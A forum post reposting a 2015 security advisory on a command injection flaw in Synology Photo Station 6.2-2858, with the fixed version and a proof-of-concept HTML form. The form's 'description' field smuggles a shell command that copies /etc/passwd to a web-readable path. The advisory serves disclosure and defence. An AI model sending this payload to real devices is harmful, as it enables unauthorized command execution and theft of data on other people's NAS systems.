Jump to content
KhiZaRix

Command injection vulnerability in Synology Photo Station 6.2-2858

Recommended Posts


------------------------------------------------------------------------
Command injection vulnerability in Synology Photo Station
------------------------------------------------------------------------
Han Sahin, May 2015

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A command injection vulnerability was found in Synology Photo Station,
which allows an attacker to execute arbitrary commands with the
privileges of the webserver. An attacker can use this vulnerability to
compromise a Synology DiskStation NAS, including all data stored on the
NAS.

------------------------------------------------------------------------
Tested version
------------------------------------------------------------------------
This issue was tested on Synology Photo Station version 6.2-2858.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Synology reports that this issue has been resolved in Photo Station
version 6.3-2945.
https://www.synology.com/en-us/releaseNote/PhotoStation

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20150502/command_injection_vulnerability_in_synology_photo_station.html

Proof of concept

The following proof of concept copies the /etc/passwd file to /var/services/photo/Securify.txt.

<html>
<body>
<form action="http://<target>/photo/webapi/photo.php" method="POST">
<input type="hidden" name="id" value="photo_536168696e_53637265656e2053686f7420323031352d30352d31302061742032322e33342e33352e706e67" />
<input type="hidden" name="description" value="| cat /etc/passwd > /var/services/photo/Securify.txt " />
<input type="hidden" name="api" value="SYNO.PhotoStation.Photo" />
<input type="hidden" name="method" value="edit" />
<input type="hidden" name="version" value="1" />
<input type="hidden" name="ps_username" value="admin" />
<input type="hidden" name="" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Sursa: http://dl.packetstormsecurity.net/1505-exploits/synologyphotostation-exec.txt

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...